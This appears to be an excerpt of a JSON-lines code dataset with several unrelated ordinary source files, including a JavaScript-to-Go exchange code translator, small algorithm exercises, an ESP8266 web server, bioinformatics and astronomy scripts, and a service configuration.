f'{call_func_by_syntax(syntax.callee, info)}'\n\n if syntax.callee.type == 'MemberExpression' and 
syntax.callee.object.type == 'Identifier' and syntax.callee.object.name == 'Object':\n if syntax.callee.property.name == 'keys':\n return f'reflect.ValueOf({call_func_by_syntax(syntax.arguments[0])}).MapKeys()'\n\n # toString -> fmt.Sprintf\n if '(' in pre_part and ')' in pre_part:\n return pre_part\n\n call_str = pre_part\n api_func_keys = [capital_first(o) for o in CODE_INFO['describe']['api'].keys()]\n api_func_pattern = f\"self\\.({'|'.join(api_func_keys)})\"\n if re.findall(api_func_pattern, call_str):\n info1 = DEFAULT_FUNC_ARGS['apifunc']\n arg_str += f', {info1[1]}' * (info1[0] - len(syntax.arguments) - 1)\n return f'self.ApiFunc(\"{syntax.callee.property.name}\", {arg_str})'\n # xx.split('_') -> string.Split(xx, '_')\n elif not call_str.endswith(')'):\n return f'{call_str}({arg_str})'\n else:\n return call_str\n\n\ndef ExpressionStatement(syntax, info={}):\n info['error_check'] = False\n s = call_func_by_syntax(syntax.expression, info)\n\n if info.get('error_check'):\n return f'_, err = {s}\\n if err != nil {{\\n return \\n}}'\n else:\n return s\n\n\ndef method_need_check_err(name, info={}):\n if any(name.lower().startswith(o) for o in ERROR_RETURN_FUNCS):\n return True\n return False\n\n\ndef VariableDeclarator(syntax, info={}):\n left = call_func_by_syntax(syntax.id)\n operator = ':='\n if left in ARG_TYPE or left in RET_TYPE:\n operator = '='\n\n info = {'pre': 'init'}\n if syntax.init.type == 'Identifier' and syntax.init.name == 'undefined':\n return f'var {left} interface{{}}'\n if syntax.id.type == 'ArrayPattern':\n return f'{left} {operator} self.Unpack{len(syntax.id.elements)}({call_func_by_syntax(syntax.init)})'\n\n right = call_func_by_syntax(syntax.init, info)\n\n if info.get('error_check'):\n return f'{left}, err {operator} {right}\\nif err != nil {{\\nreturn nil, err\\n}}'\n else:\n return f'{left} {operator} {right}'\n\n\ndef VariableDeclaration(syntax, info={}):\n return '\\n'.join([call_func_by_syntax(o) for o in syntax.declarations])\n\n\ndef ObjectExpression(syntax, info={}):\n k_v = ''\n for one in syntax.properties:\n k_v += f'\\n{call_func_by_syntax(one.key)}: {call_func_by_syntax(one.value)},'\n ret = f'map[string]interface{{}}{{{k_v}\\n}}'\n return ret\n\n\ndef Literal(syntax, info={}):\n if \"'\" in syntax.raw:\n val = syntax.raw.replace('\"', '')\n val = val.replace(\"'\", '')\n val = f'\"{val}\"'\n else:\n val = f'{syntax.value}'\n return val\n\n\ndef Identifier(syntax, info={}):\n m = {\n 'undefined': 'nil',\n 'type': 'typ',\n }\n return m.get(syntax.name, syntax.name)\n\n\ndef BinaryExpression(syntax, info={}):\n operator = syntax.operator\n\n if syntax.right.name == 'undefined':\n if operator == '===':\n return f'self.TestNil({call_func_by_syntax(syntax.left)})'\n if operator == '!==':\n return f'!self.TestNil({call_func_by_syntax(syntax.left)})'\n\n if operator == '===':\n operator = '=='\n if operator == '!==':\n operator = '!='\n if operator == 'in':\n # return f'_, ok := {call_func_by_syntax(syntax.right)}[{call_func_by_syntax(syntax.left)}]; ok'\n return f'self.InMap({call_func_by_syntax(syntax.left)}, {call_func_by_syntax(syntax.right)})'\n left = call_func_by_syntax(syntax.left)\n right = call_func_by_syntax(syntax.right)\n\n if left in ARG_TYPE and right == 'nil':\n right = NIL_MAP.get(ARG_TYPE[left], 'nil')\n\n return f'{left} {operator} {right}'\n\n\ndef call_func_by_syntax(syntax, info={}):\n try:\n return globals()[syntax.type](syntax, info)\n except Exception as e:\n print(traceback.format_exc())\n print(syntax)\n raise\n\n\ndef 
AssignmentExpression(syntax, info={}):\n operator = syntax.operator\n if syntax.left.type == 'MemberExpression':\n arg1 = call_func_by_syntax(syntax.left.object)\n arg2 = call_func_by_syntax(syntax.left.property)\n arg3 = call_func_by_syntax(syntax.right, {\"pre\": \"right\"})\n return f'self.SetValue({arg1}, {arg2}, {arg3})'\n else:\n left = call_func_by_syntax(syntax.left, {\"pre\": \"left\"})\n right = call_func_by_syntax(syntax.right, {\"pre\": \"right\"})\n return f'{left} {operator} {right}'\n\n\ndef BlockStatement(syntax, info={}):\n lines = '\\n'.join([call_func_by_syntax(block) for block in syntax.body])\n return f'{{\\n{lines}}}'\n\n\ndef IfStatement(syntax, info={}):\n ret = f'if {call_func_by_syntax(syntax.test)} '\n\n ret = f'if self.ToBool({call_func_by_syntax(syntax.test)}) '\n ret += f'{call_func_by_syntax(syntax.consequent)}'\n\n if syntax.alternate:\n ret += (\n f' else '\n f'{call_func_by_syntax(syntax.alternate)}'\n )\n\n return ret\n\n\ndef ConditionalExpression(syntax, info={}):\n return f'self.IfThenElse(self.ToBool({call_func_by_syntax(syntax.test, {\"pre\": \"test\"})}), {call_func_by_syntax(syntax.consequent)}, {call_func_by_syntax(syntax.alternate)})'\n\n\ndef ArrayPattern(syntax, info={}):\n return ', '.join([call_func_by_syntax(e) for e in syntax.elements])\n\n\ndef UnaryExpression(syntax, info={}):\n return f'{syntax.operator}self.ToBool({call_func_by_syntax(syntax.argument)})'\n\n\ndef ReturnStatement(syntax, info={}):\n if not syntax.argument:\n return f'return'\n\n if info.get('return') and ',' in info['return']:\n return f'return {call_func_by_syntax(syntax.argument)}, nil'\n else:\n return f'return {call_func_by_syntax(syntax.argument)}'\n\n\ndef UpdateExpression(syntax, info={}):\n return f'{call_func_by_syntax(syntax.argument)}{syntax.operator}'\n\n\ndef ForStatement(syntax, info={}):\n return f'for {call_func_by_syntax(syntax.init)}; {call_func_by_syntax(syntax.test)}; {call_func_by_syntax(syntax.update)} {call_func_by_syntax(syntax.body)}'\n\n\ndef ThrowStatement(syntax, info={}):\n return f'self.RaiseException(\"{syntax.argument.callee.name}\", {call_func_by_syntax(syntax.argument.arguments[0])})'\n\n\ndef LogicalExpression(syntax, info={}):\n return f'{call_func_by_syntax(syntax.left)} {syntax.operator} {call_func_by_syntax(syntax.right)}'\n\n\ndef ArrayExpression(syntax, info={}):\n elements = ','.join([call_func_by_syntax(o) for o in syntax.elements])\n return f'[]interface{{}}{{{elements}}}'\n\n\ndef capital_first(s, info={}):\n return s[0].upper() + s[1:]\n\n\nFUNC_LINES = 99\nARG_TYPE = dict()\nRET_TYPE = dict()\ndef FunctionDeclaration(syntax, info={}):\n result_code = []\n func_name = syntax.id.name\n\n global ARG_TYPE, RET_TYPE\n\n func_arg_str = get_arg(func_name)\n a = [tuple(pair.split(' ')) for pair in func_arg_str.split(', ')]\n try:\n ARG_TYPE = dict(a)\n except Exception as e:\n print(str(e))\n print(a)\n func_ret_str = get_return(func_name)\n a = [tuple(pair.split(' ')) for pair in func_ret_str.split(', ')]\n try:\n RET_TYPE = dict(a)\n except:\n RET_TYPE = {}\n\n if syntax.body.type == 'BlockStatement':\n for idx, block in enumerate(syntax.body.body):\n result_code.append(call_func_by_syntax(block, {'return': func_ret_str}))\n if idx == FUNC_LINES:\n break\n\n str_result_code = '\\n'.join(result_code)\n\n panic_deal = ''\n if func_name.lower() in PANIC_DEAL_FUNC:\n panic_deal = '''defer func() {\n\t\tif e := recover(); e != nil {\n\t\t\terr = self.PanicToError(e)\n\t\t}\n\t}()\n '''\n\n return f'''func (self *{EX_NAME}) 
{capital_first(func_name)} ({func_arg_str}) ({func_ret_str}) {{\n {panic_deal}{str_result_code}\n}}\n '''\n\n\ndef syntax_analysis(syntax, info={}):\n ret = ''\n for idx, func in enumerate(syntax):\n ret += call_func_by_syntax(func)\n return ret\n\ndef parse_by_syntax(str_code):\n str_code = str_code.replace('await ', '')\n str_code = str_code.replace('async ', 'function ')\n syntax = esprima.parse(str_code)\n return syntax_analysis(syntax.body)\n\n\ndef format_header():\n return f'''\n package {EX_NAME.lower()}\n\nimport (\n\t\"fmt\"\n\t. \"github.com/georgexdz/ccxt/go/base\"\n\t\"reflect\"\n\t\"strings\"\n)\n\ntype {EX_NAME} struct {{\n\tExchange\n}}\n\nfunc New(config *ExchangeConfig) (ex *{EX_NAME}, err error) {{\n\tex = new({EX_NAME})\n\terr = ex.Init(config)\n\tex.Child = ex\n\n\terr = ex.InitDescribe()\n\tif err != nil {{\n\t\tex = nil\n\t\treturn\n\t}}\n\n\treturn\n}}\n\n'''\n\n\ndef format_funcs(func_info_map):\n ret = ''\n\n for func, code in func_info_map.items():\n try:\n ret += parse_by_syntax(code) + '\\n'\n # print(format_describe_func(info['describe']))\n except Exception as e:\n print(code)\n print(traceback.format_exc())\n\n return ret\n\n\ndef format_ex_code(ex):\n global CODE_INFO\n info = read_code_str(ex)\n CODE_INFO = info\n\n return f'''\n {format_header()}\n {format_describe_func(info['describe'])}\n {format_funcs(info['func'])}\n '''\n\n\ndef format_test_file(ex):\n return f'''\npackage {EX_NAME.lower()}\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"io/ioutil\"\n\t\"testing\"\n)\n\nfunc get_test_config(ex *{EX_NAME.capitalize()}) {{\n\tplan, err := ioutil.ReadFile(\"test_config.json\")\n\tif err != nil {{\n\t\treturn\n\t}}\n\n\tvar data interface{{}}\n\terr = json.Unmarshal(plan, &data)\n\tif err != nil {{\n\t\treturn\n\t}}\n\t\n\tfmt.Println(data)\n\n\tif json_config, ok := data.(map[string]interface{{}}); ok {{\n ex.Urls = map[string]interface{{}}{{\n \t\"api\": map[string]interface{{}}{{\n \t\t\"public\": json_config[\"url\"],\n \t\t\"private\": json_config[\"url\"],\n\t\t\t}},\n }}\n\t\tex.ApiUrls[\"private\"] = json_config[\"url\"].(string)\n\t\tex.ApiUrls[\"public\"] = json_config[\"url\"].(string)\n\t\tex.ApiKey = json_config[\"key\"].(string)\n\t\tex.Secret = json_config[\"secret\"].(string)\n\t\tex.Password = json_config[\"password\"].(string)\n\t}}\n}}\n\nfunc TestFetchOrderBook(t *testing.T) {{\n\tex, _ := New(nil)\n\tfmt.Println(ex.ApiDecodeInfo)\n\tex.Verbose = true\n\n\tget_test_config(ex)\n\n\tmarkets, err := ex.LoadMarkets()\n\tif err != nil {{\n\t\tt.Fatal(err)\n\t\treturn\n\t}}\n\tfmt.Println(\"markets:\", markets)\n\n\torderbook, err := ex.FetchOrderBook(\"BTC/USDT\", 20, nil)\n\tif err != nil {{\n\t\tfmt.Println(err.Error())\n\t\treturn\n\t}}\n\tfmt.Println(\"orderbook:\", orderbook)\n\n\tex.FetchBalance(nil)\n\n\torder, err := ex.CreateOrder(\"ETH/BTC\", \"limit\", \"buy\", 0.0001, 0.024, nil)\n\tif err != nil {{\n\t\treturn\n\t}}\n\n\tfmt.Println(ex.FetchOrder(order[\"id\"].(string), \"ETH/BTC\", nil))\n\n\topenOrders, err := ex.FetchOpenOrders(\"ETH/BTC\", 0, 20, nil)\n\tif err == nil {{\n\t\tfmt.Println(\"openorders\", openOrders)\n\t}}\n\n\tif err == nil {{\n\t\tres, err := ex.CancelOrder(order[\"id\"].(string), \"ETH/BTC\", nil)\n\t\tfmt.Println(res, err)\n\t}}\n}}\n\n//func main() {{\n\t//ex := &ccxt.Kucoin{{}}\n\t//ex.Init()\n\t//// testFetchMarkets(ex)\n\t//fmt.Println(\"enter\")\n\t//testFetchOrderBook(ex)\n//}}'''\n\ndef write_ex_file(ex, code):\n des_dir = os.path.join('..', 'go', 'generated', f'{ex.lower()}')\n if not 
os.path.exists(des_dir):\n os.makedirs(des_dir)\n with open(os.path.join(des_dir, f'{ex.lower()}.go'), 'w') as f:\n f.write(code)\n with open(os.path.join(des_dir, f'{ex.lower()}_test.go'), 'w') as f:\n f.write(format_test_file(ex))\n # go fmt\n # cmd = \"go fmt -x %s\" % shlex.quote(des_dir)\n cmd = 'GO111MODULE=on go fmt -x %s' % shlex.quote(des_dir)\n p = subprocess.Popen(cmd, shell=True)\n p.communicate()\n\n\ndef translate():\n global EX_NAME\n for ex in get_ex_list():\n EX_NAME = ex.capitalize()\n code = format_ex_code(ex)\n write_ex_file(ex, code)\n\n\nif __name__ == '__main__':\n # test()\n print(os.getcwd())\n translate()\n","sub_path":"build/translate_to_golang.py","file_name":"translate_to_golang.py","file_ext":"py","file_size_in_byte":20701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"621910394","text":"def selection(arr):\n for i in range(len(arr)-1):\n minVal = arr[i]\n index = i\n for j in range(i+1,len(arr)):\n if minVal > arr[j]:\n minVal = arr[j]\n index = j\n arr[index], arr[i] = arr[i], minVal \n return arr\nprint(selection([5,4,3,2,1]))","sub_path":"sorting/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"617639620","text":"import machine\nimport socket\n\n#========================\n# DATA\n#========================\npins = [machine.Pin(i, machine.Pin.IN) for i in (0, 2, 4, 5, 12, 13, 14, 15)]\n\n# In below HTML code, the http-equiv=\"refresh\" content=\"10\" means\n# have the client browser update every 10 seconds\nhtml = \"\"\"\n\n \n ESP8266 Pins \n \n \n
<h1>ESP8266 Pins</h1>\n <table border=\"1\">\n <tr><th>Pin</th><th>Value</th></tr>\n %s\n </table>
\n \n\n\"\"\"\n\ndef do_connect():\n import network\n sta_if = network.WLAN(network.STA_IF)\n if not sta_if.isconnected():\n # pwd.txt should contain wlan name and password on one line\n # with a space between them and nothing else in the file\n (wap, pwd) = open('pwd.txt').read().split()\n print('connecting to network:', wap)\n sta_if.active(True)\n sta_if.connect(wap, pwd)\n while not sta_if.isconnected():\n pass\n print('network config:', sta_if.ifconfig())\n \n\n \n#========================\n# PROGRAM\n#========================\ndo_connect()\n\naddr = socket.getaddrinfo('0.0.0.0', 80)[0][-1]\ns = socket.socket()\ns.bind(addr)\ns.listen(1)\n\nprint('Webserver listening on', addr)\nwhile True:\n cl, addr = s.accept()\n print('client connected from', addr)\n cl_file = cl.makefile('rwb', 0)\n while True:\n line = cl_file.readline()\n if not line or line == b'\\r\\n':\n break\n rows = ['%s%d' % (str(p), p.value()) for p in pins]\n response = html % '\\n'.join(rows)\n cl.send(response)\n cl.close()\n ","sub_path":"webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"252688578","text":"\"\"\"Rice University Interactive Programming\nRock-paper-scissors-lizard-Spock (RPSLS) is a variant of \nRock-paper-scissors that allows five choices. \nEach choice wins against two other choices, \nloses against two other choices and ties against itself.\nUses modular arithmetic to determine a winner.\n\"\"\"\n# 0 - rock\n# 1 - Spock\n# 2 - paper\n# 3 - lizard\n# 4 - scissors\n\nimport simpleguitk as simplegui\nimport random\n\nplayer_to_print = \" \"\ncomputer_to_print = \" \"\nwinner = \" \"\n\ndef name_to_number(name):\n if name == \"rock\" or name == \"Rock\":\n return 0\n elif name == \"Spock\" or name == \"spock\":\n return 1\n elif name == \"paper\" or name == \"Paper\":\n return 2\n elif name == \"lizard\" or name == \"Lizard\":\n return 3\n elif name == \"scissors\" or name == \"Scissors\":\n return 4\n else:\n return \"Not a valid option\"\n\ndef number_to_name(number):\n if number == 0:\n return \"rock\"\n elif number == 1:\n return \"Spock\"\n elif number == 2:\n return \"paper\"\n elif number == 3:\n return \"lizard\"\n elif number == 4:\n return \"scissors\"\n else:\n return \"Not a valid option\"\n \ndef rpsls(player_choice):\n global player_to_print, computer_to_print, winner\n \n # player choice\n player_to_print = str(\"Player chooses: \" + player_choice)\n player_number = name_to_number(player_choice)\n \n #computer choice\n comp_number = random.randrange(0,5)\n comp_choice = number_to_name(comp_number)\n computer_to_print = str(\"Computer chooses: \" + comp_choice)\n \n #winner\n winner = (comp_number - player_number) % 5\n if ((player_number - comp_number)%5)>= 3:\n winner = \"Computer wins!\"\n elif ((player_number - comp_number)%5) == 0:\n winner = \"Player and computer tie!\"\n else:\n winner = \"Player wins!\"\n \ndef restart():\n global player_to_print, computer_to_print, winner\n player_to_print = \" \"\n computer_to_print = \" \"\n winner = \" \"\n \n#interactive rpsls\n\ndef get_guess(guess):\n #if not an accepted input\n global winner\n if not (guess == \"rock\" or guess == \"Rock\" or guess == \"Spock\" or guess == \"spock\" \n or guess == \"paper\" or guess == \"Paper\" or guess == \"lizard\" or\n guess == \"Lizard\" or guess == \"scissors\" or guess == \"Scissors\"):\n winner = 'Error: Bad input, not an included choice'\n else:\n rpsls(guess)\n 
\ndef draw(canvas):\n #draw output in frame\n canvas.draw_text(player_to_print, [20, 50], 20, \"Green\")\n canvas.draw_text(computer_to_print, [20, 85], 20, \"Green\")\n canvas.draw_text(winner, [20, 125], 20, \"Green\")\n \n#create frame\nframe = simplegui.create_frame(\"Rock-Paper-Scissors-Lizard-Spock\", 400, 200)\nframe.add_input(\"Player Choice\", get_guess, 200)\nframe.set_canvas_background(\"Pink\")\nframe.set_draw_handler(draw)\nframe.add_button(\"Clear board\", restart, 100)\n\nframe.start()","sub_path":"rpsls.py","file_name":"rpsls.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"647309445","text":"import ReadCounts, Tools, TailSeqAnalyzer\nfrom BlastTailAnalyzer import fullBlastTailer\nfrom ThreeSeqAnalyzer import blaster\n\n\n\ndef hitFinder(target, r1, r2):\n \"\"\"Barcode added by Rea's protocol is found on the 5' end of the read. That barcode can be found in r1 if the read\n is short enough, but you'll definitely see it in read 2 since that starts from the 5' end. Using the illumina\n platform, r1 will need to be reverse complemented to be correct and r2 will need to not be. This function finds all\n reads with the barcode in r1 and then returns the corresponding r2 reads.\"\"\"\n\n hits = []\n for i in range(0, len(r2)):\n if target in r2[i]:\n hits.append(r1[i])\n\n return hits\n\ndef deMultiplexer(name, barcode, ranMerLen, r1, r2, mismatch=0):\n \"\"\"Takes the name of the sample, the barcode sequence, and the length of the randomMer. Finds the barcode in read1,\n returns the corresponding reads in read2, performs the read count operation and outputs it to a folder with the\n samplename.csv\"\"\"\n print(name, barcode, ranMerLen)\n hits = hitFinder(barcode, r1, r2)\n\n counts = ReadCounts.readCounter(hits, ranMerLen=ranMerLen, mismatch=mismatch)\n\n return counts\n\ndef batchDeMultiplexer(r1Loc, r2Loc, manifestLoc, outLoc, header=True):\n \"\"\"Takes every line of a standard manifest file and uses that to perform a read counts on each one. 
Can specify\n whether or not it has a header.\"\"\"\n\n r1 = ReadCounts.fastqParser(r1Loc)\n r2 = ReadCounts.fastqParser(r2Loc, revComp=False)\n assert len(r1) == len (r2)\n\n manifest = open(manifestLoc, 'r')\n if header: next(manifest) #skips header\n for line in manifest:\n line = line.split(\",\")\n name = line[0]\n barcode = line[2].rstrip() + line[3].rstrip()\n ranMerLen = int(line[4]) + 2\n counts = deMultiplexer(name, barcode, ranMerLen, r1, r2)\n counts = sorted(counts, key = lambda x:x[2], reverse = True)\n Tools.CSVWriter(counts, outLoc+name+\".csv\",header=\"Read,Total Reads,Unique Reads\")\n\n return 0\n\ndef newDeMultiplexer(manifestLoc, inFolder, outFolder, header = True):\n #inFolder/701501r1.fasta.gz\n manifest = open(manifestLoc, 'r')\n if header: next(manifest)\n for line in manifest:\n line = line.rstrip().split(\",\")\n print(line[0], line[2], line[4], line[5], line[6])\n r1Loc = inFolder + line[5] + line[6] +\"r1.fastq.gz\"\n r2Loc = inFolder + line[5] + line[6] +\"r2.fastq.gz\"\n\n r1 = ReadCounts.fastqParser(r1Loc)\n r2 = ReadCounts.fastqParser(r2Loc, revComp=False)\n\n counts = deMultiplexer(line[0], line[2]+line[3], int(line[4])+2, r1, r2)\n counts = blaster(counts, dbLoc = \"YRNA.fa\", blastLoc = \"blastn.exe\")\n tails = fullBlastTailer(counts)\n Tools.CSVWriter(tails, outFolder+line[0]+\"_tails.csv\", header =\"Sequence,UniqueReads,Gene,3'end,tailLength,TailSeq\")\n\n\n\n\n\n\n\n\n\n\n#######################################################################\n\nif __name__==\"__main__\":\n\n manifestLoc=\"\"\n outFolder = \"\"\n r1Loc = \"\"\n r2Loc = \"\"\n header = True\n\n r1 = ReadCounts.fastqParser(r1Loc)\n r2 = ReadCounts.fastqParser(r2Loc, revComp=False)\n assert len(r1) == len (r2)\n\n manifest = open(manifestLoc, 'r')\n if header: next(manifest) #skips header\n for line in manifest:\n line = line.split(\",\")\n name = line[0]\n barcode = line[2].rstrip() + line[3].rstrip()\n ranMerLen = int(line[4]) + 2\n counts = deMultiplexer(name, barcode, ranMerLen, r1, r2)\n counts = sorted(counts, key = lambda x:x[2], reverse = True)\n tails = fullBlastTailer(counts, fastaTargets = \"yRNA+uRNA.fa\")\n Tools.CSVWriter(tails, outFolder+name+\".csv\", header=\"Sequence,UniqueReads,Gene,3'end,tailLength,TailSeq\")\n\n\n\n\n\n","sub_path":"deMultiplexer.py","file_name":"deMultiplexer.py","file_ext":"py","file_size_in_byte":3805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"263180347","text":"\"\"\"\nGiven an integer n and an integer start.\n\nDefine an array nums where nums[i] = start + 2*i (0-indexed) and n == nums.length.\n\nReturn the bitwise XOR of all elements of nums.\n\n\n\nExample 1:\n\nInput: n = 5, start = 0\nOutput: 8\nExplanation: Array nums is equal to [0, 2, 4, 6, 8] where (0 ^ 2 ^ 4 ^ 6 ^ 8) = 8.\nWhere \"^\" corresponds to bitwise XOR operator.\n\nConstraints:\n\n1 <= n <= 1000\n0 <= start <= 1000\nn == nums.length\n\"\"\"\n\n\ndef xorOperation(n: int, start: int) -> int:\n count = start\n while n - 1 > 0:\n count ^= 2 + start\n n -= 1\n start += 2\n return count\n","sub_path":"easy/1486 XOR Operation in an Array/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"503212072","text":"from KMean import Cluster as c\nfrom KMean import Point as p\nfrom datetime import datetime as dt\nimport jsonpickle\nimport json\ndef find_largest_cluster():\n\tmax_val 
=0\n\tindex=0\n\tcount=0\n\tfor cluster in clusters:\n\t\tclust_size = cluster.get_size()\n\t\tif (clust_size>max_val):\n\t\t\tmax_val=clust_size\n\t\t\tindex=count\n\t\tcount+=1\n\treturn clusters[index]\n\n\n#create clusters/ loads previous data\njson_file = open(\"out.json\", 'r')\nclusters = []\nfor line in json_file:\n\tclusters.append(jsonpickle.decode(line))\njson_file.close()\n#for x in range (0,23):\n#\tclusters.append(c(str(x)))\n\n\nnum_val =input(\"Enter your favourite number: \")\nif (int(num_val)>99):\n\tprint (\"Please enter a number from 0-99\")\n\tnum_val =input(\"Enter your favourite number:\")\n\n\n\n\nwhile (num_val != \"Quit\"):\n\tpoint = p(num_val,dt.now().strftime('%H'))\n\tclusters[int(point.get_y())].add_in_cluster(point)\n\t#calc the centroids\n\tfor cluster in clusters:\n\t\tcluster.calc_centroid()\n\n\n\tlargest_cluster = find_largest_cluster()\n\n\tfave_point = largest_cluster.get_close_centroid()\n\n\tprint (fave_point.get_x())\n\t#checks to quit or learn more.\n\tnum_val = input(\"Enter your favourite number: \")\n\n##save the data\njson_file = open(\"out.json\", 'w')\nfor cluster in clusters:\n\ts = jsonpickle.dumps(cluster)\n\tjson_file.write(s+\"\\n\")\n\njson_file.close()\n","sub_path":"ProjDelta.py","file_name":"ProjDelta.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"617551133","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef rechannelize(pulse, nchan):\n pulse = np.fft.irfft(pulse, axis=1)\n # Reshape to channels and keep polarization\n if pulse.shape[-1] == 2:\n pulse = pulse.reshape(-1, 2*nchan, 2)\n else:\n pulse = pulse.reshape(-1, 2*nchan)\n pulse = np.fft.rfft(pulse, axis=1)\n return pulse\n\n# Stored each pulse as voltages with 4096 channels\n# Array with dimensions [time, freq, pol]\np1 = np.load('/mnt/raid-cita/ramain/p1.npy')\np2 = np.load('/mnt/raid-cita/ramain/p2.npy')\n\np1_coarse = rechannelize(p1, 128)\n\np1fine = rechannelize(p1, 2**16)\np2fine = rechannelize(p2, 2**16)\n\np1_selfphased = (p1fine / p1fine) * abs(p1fine)\np1_polphased = (p1fine[...,0] / p1fine[...,1]) * abs(p1fine[...,1])\np1_phased = (p1fine / p2fine) * abs(p2fine)\n\np1_selfphased = rechannelize(p1_selfphased, 128)\np1_polphased = rechannelize(p1_polphased, 128)\np1_phased = rechannelize(p1_phased, 128)\n\nplt.plot(abs(p1_coarse[...,0]).sum(1),'b', label='original signal')\nplt.plot(abs(p1_selfphased[...,0]).sum(1), 'g', label='self phased')\nplt.plot(abs(p1_polphased).sum(1), 'k', label='self pol phased')\nplt.plot(abs(p1_phased[...,0]).sum(1), 'r', label='2 pulse phased')\n\nplt.yscale('log')\nplt.xlim(3500, 5500)\nplt.ylim(80, 10000)\nplt.legend()\nplt.show()\n","sub_path":"crab/rechan.py","file_name":"rechan.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"192034097","text":"from celery.schedules import crontab\nimport os\n\n\n# groupid=0 -> admin\n# groupid=1 -> Our users\n# groupid=2 -> Other users\ndef create_rule(user):\n create_param = {}\n if user.groupid <= 1:\n create_param.update({\n 'groupname': 'toolmen',\n 'homepath': user.name,\n 'homepvc': \"nfs-homenas\",\n 'naspvc': \"nfs-labnas\",\n })\n elif user.groupid == 2:\n create_param.update({\n 'groupname': 'test',\n 'homepath': 'others/' + user.name,\n 'homepvc': \"nfs-homenas\",\n 'naspvc': \"\",\n })\n return create_param\n\ndef gpu_is_free(value):\n \"\"\"\n The decision function of 
finding server with available gpu.\n Parameters\n ----------\n value: array\n A array of time series array of each metrics.\n e.g. [A metrics time series, B metrics time series]\n \"\"\"\n duty = sum(value[0]) / len(value[0])\n memory = sum(value[1]) / len(value[1])\n return duty < 10 and memory < 1\n\n\nconfig = {\n # Basic\n 'bullet': \"\",\n 'name': 'Toolmen',\n 'domain_name': '{{ domain_name }}',\n 'SECRET_KEY': '{{ secretkey }}',\n\n # Sehedule\n 'celery_schedule': {\n # Maintain all instances(at 2 a.m.)\n 'box-routine': {\n 'task': 'labboxmain.box.routineMaintain',\n 'schedule': crontab(hour=2, minute=0),\n },\n },\n\n # Link\n 'links': [{\n 'name': 'Monitor',\n 'link': '/monitor/'\n }, {\n 'name': 'Drive',\n 'link': '/drive/'\n }, {\n 'name': 'Help',\n 'link': '/help'\n }\n ],\n\n # Registry settigs\n 'registry_url': 'harbor.default.svc.cluster.local', # empty to disable\n 'registry_user': 'user',\n 'registry_password': '{{ registry_password }}',\n 'registry_repo_backup': 'user/backup',\n 'registry_repo_default': 'linnil1/serverbox',\n\n # Data path\n 'SQLALCHEMY_DATABASE_URI': 'sqlite:////data/db.sqlite',\n 'logfile': '/data/main_log.log',\n\n # init\n 'create_rule': create_rule,\n 'OAUTH2_REFRESH_TOKEN_GENERATOR': True,\n 'SQLALCHEMY_TRACK_MODIFICATIONS': False,\n 'SCHEDULER_API_ENABLED': True,\n\n # Method for connecting to pod\n 'sshpiper': '/data/sshpiper/',\n 'vnc_password': '{{ vncpw }}',\n\n # Only use dockerapi(Not maintained now)\n # 'labboxapi-docker': 'http://dockerserver:3476', # Use without kubernetes\n\n # Use k8s api\n 'labboxapi-k8s': \"http://{}:3476\".format(os.environ.get(\"NAME_K8SAPI\")),\n\n # Backgroud method\n 'celery_broker_url': 'redis://{}:6379'.format(os.environ.get(\"NAME_REDIS\")),\n 'celery_result_backend': 'redis://{}:6379'.format(os.environ.get(\"NAME_REDIS\")),\n\n # for email\n 'email_sender': \"http://{}:5870/mail\".format(os.environ.get(\"NAME_EMAIL_SENDER\")),\n 'email_title': {\n 'register': \"Registration of ToolmenLab\",\n 'forgetpass': \"Reset Password for ToolmenLab\"\n },\n\n # GPU settings\n # Details see in box_queue.py\n # set gpu_monitor_url = null to disable monitor gpu\n # 'gpu_monitor_url': '',\n 'queue_quota': 6,\n 'gpu_monitor_url': 'http://lab-monitor-prometheus-server.monitor.svc.cluster.local/api/v1/',\n 'gpu_query_metrics': ['nvidia_gpu_duty_cycle', 'nvidia_gpu_memory_used_bytes / nvidia_gpu_memory_total_bytes'],\n 'gpu_is_free': gpu_is_free,\n 'gpu_query_interval': 60,\n 'gpu_exe_interval': 300,\n}\n\n# Running queue(Not need to change)\nconfig['celery_schedule']['queue-run'] = {\n 'task': 'labboxmain.box_queue.scheduleGPU',\n 'schedule': crontab(minute='*'),\n}\n","sub_path":"labboxmain/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"597970554","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Aug 23 16:17:38 2019\r\n\r\n@author: Silvester\r\n\"\"\"\r\n\r\nimport tkinter as tk\r\nimport book_store_backend_networked\r\n\r\ndef get_selected_row(event):\r\n try:\r\n global selected_tuple\r\n index=list_box.curselection()[0]\r\n selected_tuple=list_box.get(index)\r\n #print(index)\r\n #print(selected_tuple[3])\r\n #return(selected_tuple) no need to return selected_tuple, its a global variable and we can point to it\r\n ent_title.delete(0,tk.END)\r\n ent_title.insert(tk.END,selected_tuple[1])\r\n ent_author.delete(0,tk.END)\r\n ent_author.insert(tk.END,selected_tuple[2])\r\n 
